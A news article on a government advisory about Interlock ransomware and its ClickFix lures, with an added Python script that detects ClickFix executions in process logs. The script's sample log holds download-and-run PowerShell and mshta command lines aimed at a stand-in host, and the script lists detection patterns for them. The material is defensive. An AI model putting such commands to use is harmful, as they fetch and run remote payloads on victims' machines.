The FBI, CISA, Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint cybersecurity advisory warning of an emerging ransomware threat from Interlock, a group that uses double extortion tactics to target businesses and critical infrastructure organizations across the US.

The Interlock ransomware variant was first identified in September 2024. Its encryptors are built for both Windows and Linux. In the cases observed so far, the advisory notes, the actors have used them to encrypt virtual machines (VMs) on both platforms.

Interlock uses uncommon entry points

Unlike many ransomware operations that rely on phishing or exposed Remote Desktop Protocol (RDP) services, Interlock actors, according to FBI investigations, gain initial access through drive-by downloads from compromised legitimate websites, a relatively rare technique for ransomware.

They have also employed ClickFix, a social engineering method that tricks victims into running a malicious payload themselves under the pretense of resolving a system issue. Once inside, the actors use a range of techniques for discovery, credential access, and lateral movement to spread to other systems on the network.
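Because a ClickFix lure ends with the victim pasting a command into the Run dialog or the Explorer address bar, the resulting process tree is a useful detection signal: a script host whose parent is explorer.exe, with a command line that fetches or decodes something. The following is an added example, not code or detection content from the advisory; it assumes Sysmon-style process-creation events exported as JSON lines with the fields Image, ParentImage, CommandLine and User, and the sample events it scans are constructed for this illustration (the 203.0.113.0/24 addresses are documentation space, not indicators). The host list and command-line cues are heuristics to tune per environment.

```python
"""Heuristic detection of ClickFix-style execution from process-creation logs.

Added illustration; not from the CISA/FBI advisory or any vendor tooling.
Assumes Sysmon-style Event ID 1 records as JSON lines. Sample data is constructed.
"""
import json
import re
from typing import Iterable, List, Optional

# Script hosts a pasted "fix" command typically launches (assumption: tune per estate).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line cues for download-and-run one-liners: (regex, label).
PAYLOAD_CUES = [
    (r"https?://", "remote URL"),
    (r"(?i)\biex\b|invoke-expression", "in-memory execution"),
    (r"(?i)-enc(odedcommand)?\b", "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\bmshta\b", "HTA host"),
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> Optional[dict]:
    """Return an alert dict if the event looks like a pasted ClickFix command, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    # The user-interaction signal: a script host spawned directly by the shell.
    if parent != "explorer.exe" or child not in SCRIPT_HOSTS:
        return None
    hits = [label for pattern, label in PAYLOAD_CUES if re.search(pattern, cmdline)]
    if not hits:
        return None  # explorer.exe launching cmd for "dir" is normal user activity
    return {"user": event.get("User"), "image": child, "cues": hits, "cmdline": cmdline}


def detect(lines: Iterable[str]) -> List[dict]:
    """Scan JSON-lines process-creation events and return the alerts raised."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        alert = score_event(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_LOG = r'''
{"EventID":1,"User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iex (iwr http://203.0.113.10/fix.txt)\""}
{"EventID":1,"User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt"}
{"EventID":1,"User":"CORP\\svc_build","ParentImage":"C:\\Program Files\\Jenkins\\jenkins.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -File build.ps1"}
{"EventID":1,"User":"CORP\\asmith","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta https://203.0.113.10/verify.hta"}
{"EventID":1,"User":"CORP\\jdoe","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd /c dir"}
'''

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the sample, the rule flags the two explorer.exe-spawned script hosts that fetch content (the PowerShell and mshta events) and stays silent on Notepad, on PowerShell launched by a build service, and on a plain `cmd /c dir`. The parent-process condition is what keeps the noise down; the command-line cues alone would also match legitimate administration.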

Interlock actors use a double extortion model: they exfiltrate data first and then encrypt systems, pressuring victims to pay both to get their data decrypted and to prevent it from being leaked, the advisory stated. Notably, the ransom notes contain neither a ransom demand nor payment instructions. Instead, each victim is given a unique code and instructed to contact the group via a .onion URL through the Tor browser, the advisory noted.

“What makes Interlock uniquely dangerous is not the technical novelty of its encryption payload, but its orchestration of psychological and procedural blind spots across the enterprise. This group has weaponised familiarity by using trusted UI elements like the Windows Explorer address bar to execute remote access trojans with minimal user suspicion,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research. “They exploit patch cycles, user habits, and the assumed sanctity of digital hygiene. By embedding across multiple vectors, such as social, technical, and procedural, Interlock increases recovery cost not just in infrastructure, but in trust and governance posture. Its pivot from fake CAPTCHA prompts to deceptive ‘fix’ messages reflects an agile, feedback-driven threat actor able to learn and adapt faster than most enterprise defence protocols can cycle.”

Target sectors and global reach

The advisory did not disclose the names of targeted organizations, but noted that critical infrastructure and other organizations in North America and Europe have been targeted in the past.

“Healthcare has been a primary target, with incidents involving DaVita and Kettering Health. Education, technology, manufacturing, and government have also been hit,” said Amit Jaju, senior managing director at Ankura Consulting. “Going forward, critical infrastructure, particularly energy and transportation, as well as financial services, are vulnerable due to virtualization dependencies.”

Layered defenses are critical to mitigation

So far Interlock actors have focused on encrypting virtual machines, but hosts, workstations, and physical servers could be targeted in the future. To mitigate these risks, robust endpoint detection and response (EDR) capabilities should be deployed, alongside broader security hardening efforts.

Key steps include implementing DNS filtering and web access firewalls, and training users to recognize social engineering attempts such as ClickFix. Organizations should also patch known vulnerabilities across operating systems, firmware, and applications, and segment networks so that lateral movement is contained after an initial compromise.

Security teams are also advised to enforce strong identity, credential, and access management (ICAM) policies, including multi-factor authentication (MFA) across all services where feasible.

“To strengthen defenses against threats like Interlock, enterprises should go beyond standard advisories by adopting layered strategies. This includes implementing clipboard and UI controls to block or prompt paste actions into Explorer or Run, and enforcing Group Policy or endpoint restrictions on suspicious behaviors,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. “Organizations should also restrict user execution rights by limiting access to system dialogs and script execution. Additionally, DNS and web filtering should be enhanced beyond basic blocking to include content analysis and detection of script-based copy/paste attacks delivered via compromised websites.”

Enterprises should also keep offline, immutable backups to avoid ransom dependence.
